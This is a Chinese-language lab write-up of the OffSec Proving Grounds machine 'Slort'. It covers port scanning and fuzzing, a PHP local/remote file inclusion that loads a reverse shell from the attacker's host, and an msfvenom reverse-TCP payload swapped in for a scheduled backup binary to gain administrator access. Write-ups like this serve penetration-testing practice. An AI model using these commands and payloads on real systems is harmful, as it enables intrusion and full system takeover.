Slort-白鸢的笔记

简介

point 20

Slort

Difficulty INTERMEDIATE

rated by community INTERMEDIATE

实验环境

攻击者 Kali 192.168.45.231

受害者 IP 192.168.166.53 Windows

1. 信息收集

收集受害者服务详情

21/tcp   open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '192.168.45.231' is not allowed to connect to this MariaDB server
4443/tcp open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.166.53:4443/dashboard/
8080/tcp open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.166.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests

ftp、smb以及smb漏洞扫描都没用

查看4443和8080端口发现是一模一样的

FUZZ扫描

export URL="http://192.168.166.53:4443/FUZZ"
root@zhyann:~# wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"
root@zhyann:~# wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

发现有一个site目录可能有用

2024-04-19_20-27

2. 漏洞挖掘与利用

2024-04-19_20-29

看到page= 我首先想到LFI和RFI

先尝试一下LFI

2024-04-19_20-31

可以看到我使用php://filter可以返回main.php的base64编码

php://filter/convert.base64-encode/resource=main.php

这样可以确定肯定有LFI

尝试一下能不能RFI

我们使用这个php-shell

https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php?ref=benheater.com

2024-04-19_20-33

Kali建立python服务器

然后使用RFI

http://192.168.45.231/php-reverse-shell-windows.php

2024-04-19_20-35

Kali监听9000端口

发送之后就能拿到shell了

3. 权限提升

systeminfo

然后wesng扫描看看有没有

python3 wes.py /tmp/test.txt -i 'Elevation of Privilege' --exploits-only -o vuln.csv

2024-04-19_20-37

发现并没有

查看有没有什么进程

powershell.exe
Get-CimInstance -ClassName Win32_Process | Sort Name | Select Name, CommandLine | Format-List

没有什么

查看有没有什么有趣的服务

Get-CimInstance -ClassName Win32_Service | Sort Name | Where-Object {$_.State -eq 'Running'} | Select Name, PathName | Format-List

没有什么

在C:\Backup中发现有比较有意思的

2024-04-19_20-39

发现我们可以操作

并且在Info.txt中发现运行原理

我们可以尝试把TFTP.EXE替换成我们的木马

msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.45.231 LPORT=4444 -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o TFTP.exe

smb传输

python3 smbserver.py -smb2support tools .       #Kali
copy \\192.168.45.231\tools\TFTP.exe .          #windows

Kali监听4444端口

等待之后就可以拿到slort\administrator的shell了

2024-04-19_20-44

文章版权归作者所有，未经允许请勿转载。

THE END

Offensive Security PG Practise